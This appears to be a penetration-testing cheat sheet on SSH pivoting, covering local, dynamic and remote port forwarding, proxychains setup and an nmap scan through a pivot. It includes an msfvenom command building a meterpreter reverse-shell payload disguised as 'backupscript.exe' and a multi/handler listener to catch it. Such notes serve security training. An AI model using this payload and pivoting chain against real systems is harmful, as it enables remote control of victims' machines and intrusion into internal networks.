SSH

Local port forwarding

ssh -L 1234:localhost:3306 Ubuntu@10.129.202.64

The -L command tells the SSH client to request the SSH server to forward all the data we send via the port 1234 to localhost:3306 on the Ubuntu server.

Confirming Port Forward with Netstat

netstat -antp | grep 1234

Dynamic port forwarding

ssh -D 1080 ubuntu@10.129.202.64

The -D argument requests the SSH server to enable dynamic port forwarding. Once we have this enabled, we will require a tool that can route any tool's packets over port 9050.

To inform proxychains that we must use port 1080, we must modify the proxychains configuration file located at /etc/proxychains.conf. We can add socks5 127.0.0.1 1080 to the last line if it is not already there.

Nmap

One more important note to remember here is that we can only perform a full TCP connect scan over proxychains.

proxychains nmap -v -Pn -sT 172.16.5.19

Setting up remote/reverse port forwarding through SSH

Payload - listener sent to InteralIPofPivotHost:8080

msfvenom -p windows/x64/meterpreter/reverse_https lhost= <InteralIPofPivotHost> -f exe -o backupscript.exe LPORT=8080

SSH remote port forward - InteralIPofPivotHost:8080 --> 8000

ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN

Local listener on port 0.0.0.0:8000

Use multi/handler LPORT 8000

PreviousProxies and port fowarding NextMetasploit

Last updated 3 years ago